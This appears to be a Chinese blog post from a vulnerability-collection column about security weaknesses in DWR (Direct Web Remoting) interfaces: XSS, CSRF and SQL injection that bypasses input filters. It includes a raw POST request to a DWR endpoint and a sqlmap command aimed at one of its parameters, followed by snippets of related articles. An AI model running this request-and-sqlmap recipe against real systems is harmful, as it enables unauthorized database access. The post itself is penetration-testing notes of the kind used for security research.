DWR安全问题

最新推荐文章于 2024-05-23 15:57:40 发布
最新推荐文章于 2024-05-23 15:57:40 发布
阅读量6.8k 收藏 2
点赞数
分类专栏: 漏洞收集 文章标签: dwr
本文分析了DWR接口中存在的安全问题,包括XSS攻击及CSRF风险,并探讨了通过DWR接口绕过程序安全限制的可能性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

作者 -- Ends


昨天测试某系统没有发现比较严重的问题,从数据包中发现了dwr接口,尝试下XSS返回为text/plain。查看官方对DWR Security的说明(http://directwebremoting.org/dwr/security/index.html)也是说XSS、CSRF的。如果接口中包含上传功能,应该和webservice类似吧,还没有利用成功过。
dwr

使用接口时还存在一个问题,程序对特殊字符进行过滤,但是接口存在注入等问题,这样通过接口就可绕过程序的安全限制。

POST http://ends.cc/dwr/call/plaincall/providerregisterLbTProviderForm.forCheck.dwr HTTP/1.1
Accept: */*
Content-Type: text/plain
Referer: http://ends.cc/xxxxxxx
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ends.cc
Content-Length: 354
Connection: Keep-Alive
Pragma: no-cache

callCount=1&page=/xxxxxxxxxx&httpSessionId=sssssssssssssssssssssssssssssssssss!164282365!432731937&scriptSessionId=sssssssssssssssssssssssssssssss&c0-scriptName=providerregisterLbTProviderForm&c0-methodName=forCheck&c0-id=0&c0-e1=string:testest&c0-e2=string:&c0-param0=Object_Object:{userName:reference:c0-e1, password:reference:c0-e2}&batchId=2


python sqlmap.py -r sqlmap.xml -p c0-e1
圣乔ERP系统 ResultSetConvertor SQL注入漏洞复现
0xSec
12-07 277
圣乔ERP系统 ResultSetConvertor.queryForMapWithDefaultValues.dwr 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
DWR bug致使CPU 飙高的原因分析
子夜侠客FINN的博客
11-12 333
项目代码使用了DWR组件来进行异步调用,采用的DWR版本为3.0,但最近WebLogic经常发生线程STUCK,经过分析WebLogic的日志,发现了如下信息:[code="java"]
【nday】2023hvv 泛微漏洞合集
最新发布
伏一
05-23 1231
【nday】2023hvv 泛微漏洞合集
java dwr 漏洞_实战渗透-基于DWR框架下的漏洞探测
weixin_34878397的博客
02-26 5277
前言未经授权,禁止转载!0x01前段时间,在对某站群系统进行代码审计时,发现某处DWR-AJAX接口存在文件上传漏洞代码层:public String upload(InputStream is, String fileName) {String fileUploadPath = getFileUploadPath();String file = String.valueOf(fileUpload...
buffalo dwr漏洞
weixin_33984032的博客
10-15 330
在编写java代码的时候,我们可能经常使用buffalo实现AJAX的调用,将一个java代码直接发布成可以js可远程调用的 方法,在得到方便的同时,可能我们忽略了安全问题,如果java代码不是读取数据那么简单,而是删除,更新数据库 或者文件操作的方法。 黑客就很有可能通过如下代码进行攻击,想想如果该方法是个删除关键数据的操作,那就危险了。 public static void...
java dwr 漏洞_DWR异常情况处理常见方法解析
weixin_42346710的博客
02-26 1186
在本次项目中,由于时间紧张直接使用DWR做Ajax请求!要求的是动态展示,那就需要使用DWR轮询请求,但是需要做异常情况下的一些处理!特别是DWR在遇到异常后,后台不报错,前台也只提示一个 Error !如果是轮询的话,那么就一直弹出 Error ,那谁收到了呀!对于DWR异常的处理,网上一大片都是这样说的,在DWR配置中增加一个转换器,将异常转换为一般异常,这样在前台就不是提示 Error,而是...
java dwr 漏洞_Java DWR内存泄漏问题解决方案
weixin_28685287的博客
02-26 696
机器跑了一晚上,发现有崩溃现象,由于页面内有动态绘图功能,我怀疑是绘图原因,但是今天上午有人提醒我才想到,是不是间隔调用时DWR产生了内存泄漏问题?网上查了一下貌似大家都在讨论这个问题,之前我也挺老手说过DWR有内存问题,可是没有遇到过。原来DWR在间隔调用这种情况下会有问题!按照大家的说法,修改engine.js配置文件来解决问题,目前我也修改了一下,修改方法如下:在dwr.engine._se...
dwrdwr.xml文件存放问题 持续更新
shayu52242419870805的专栏
08-29 2521
初步使用dwr,对很多里面的东西不熟,在写demo的过程中,将dwr.xml文件放在了resource文件下面,导致打包的时候文件被部署到classes文件下面,这样dwr在默认情况下是读取不到的,在网上查询了一下,并看了一下dwr的加载源码,发现dwr默认是在Web容器的WEB-INF下面自动加载dwr.xml文件的,那么是否可以存放其他地方了,答案是当然的。下面是我在网上看到的一些详细的讲解,
dwr源码.rar_DWR源代码
09-24
DWR的核心功能在于它提供了一种安全且高效的方式,使得Web应用可以实时更新客户端的页面而无需刷新整个页面,这种技术被称为Ajax(Asynchronous JavaScript and XML)。DWR源码分析将帮助我们深入理解其内部机制,为...
dwr.rar_dwr_dwr tutorial
09-21
Direct Web Remoting (DWR) 是一个开源Java库,它允许Web应用程序在浏览器和服务器之间进行实时、安全的双向通信。这个"**dwr.rar_dwr_dwr tutorial**"压缩包显然包含了一份高质量的DWR教程,可以帮助学习者在短短一...
dwr.rar_dwr_dwr Stri_dwr javabean
09-24
`Allow`定义了哪些Java类和方法可以被JavaScript访问,确保安全性。`Ajax`则处理实际的异步通信,使页面更新无需刷新。 1. **字符串(String)**操作:在DWR中,字符串操作非常直接。你可以像调用本地JavaScript函数...
dwr.rar_dwr
09-14
3. **类型安全**:DWR在JavaScript和Java之间进行数据转换时,保持类型安全,避免了JSON或XML序列化带来的潜在问题。 4. **异步和同步调用**:DWR支持异步调用,允许用户在不刷新页面的情况下更新部分内容。同时,...
DWR小结
03-01
博文链接:https://huxiuliang.iteye.com/blog/234274
java sql注入包_SQL注入漏洞-Java
weixin_42160278的博客
02-24 231
这个是常见的漏洞了,相信大家都不会陌生,直接上解决该漏洞的代码package com.ifan.soft.filter;import java.io.IOException;import java.text.SimpleDateFormat;import java.util.Date;import javax.servlet.Filter;import javax.servlet.FilterCh...
框架注入漏洞
conkeyn的专栏
02-27 5689
  2 详细描述 攻击者有可能注入含有恶意内容的 frame 或 iframe 标记。如果用户不够谨慎,就有可能浏览该标记,却意识不到自己会离开原始站点而进入恶意的站点。之后,攻击者便可以诱导用户再次登录,然后获取其登录凭证。 解决办法 建议过滤出所有以下字符: [1] |(竖线符号) [2] & (& 符号) [3];(分号) [4] $(美元符号...
dwr 框架
terryjs
09-20 229
首先,你安装DWR时会配置一个servlet,这个servlet记得吧?他就是负责把前台的JS参数封装成JAVA,去调用你的JAVA类,然后将返回结果(JAVA类型)再翻译成JS生成到你的JSP页面上,给你的错觉就是你用JS直接调用了JAVA方法。DWR的主要的优点:可以直接访问Javabean,无刷新技术.DWR框架实现:1.在配置文件中写入dwr的配置信息2.写一个属性bean。3.通过一个...
DWR框架安全
我的博客
10-29 457
    DWR非常全面地考虑过安全问题,在DWR网站上有许多这方面的讨论。     在使用DWR的过程中,我们在dwr.xml中手动指定哪些java类和方法我们想远程给JavaScript。这样,我们就可以确保没有攻击者能够利用除此之外的其他对象。     在dwr.xml中,对于每个远程Java类,都有一个create条目,我们可以用singleton、new或其他一些机制。还可以限制哪些...
关于dwr安全问题
持续改进
07-04 1264
在一些网站中,我们虽然使用了AJAX,但是我们并不希望用户能够私自调用这些AJAX,因为有些AJAX调用会包含对数据的更新操作,即使是只读的操作,也不希望用户能在本地进行直接调用。 在 Michael Chen 的这篇文章中 [url]http://michael.nona.name/archives/142[/url] ,提及了ajax应用中的安全问题,并且给出了一个临时的解决方案。虽然我...
DWR入门与常见问题避免指南
同时,配置合适的日志级别和文件,以便跟踪DWR的运行状态和问题。 6. **跨域支持**: 如果你的应用需要与不同的域协作,可能需要配置CORS(Cross-Origin Resource Sharing)策略,允许跨域请求。 7. **学习资源和...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值